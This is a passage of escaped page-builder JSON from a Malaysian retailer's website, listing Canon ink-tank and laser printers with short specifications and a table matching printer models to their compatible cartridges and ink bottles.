G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY iB4170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 